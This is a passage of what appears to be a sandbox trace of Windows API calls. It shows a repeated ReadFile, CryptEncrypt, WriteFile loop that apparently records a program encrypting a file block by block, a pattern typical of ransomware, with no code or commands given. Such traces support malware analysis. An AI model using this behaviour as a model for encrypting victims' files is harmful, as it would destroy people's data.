pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.708] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.708] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.708] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.708] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.708] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.709] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.709] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.709] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.709] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.709] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.710] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.710] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.710] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.710] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.710] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.710] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.711] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.711] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.711] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.711] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.711] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.712] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.712] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.712] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.712] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.712] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.713] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.713] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.713] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.713] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.713] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.713] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.714] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.714] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.714] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.714] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.714] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.715] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.715] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.715] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.715] WriteFile (in: hFile=0x5d80, 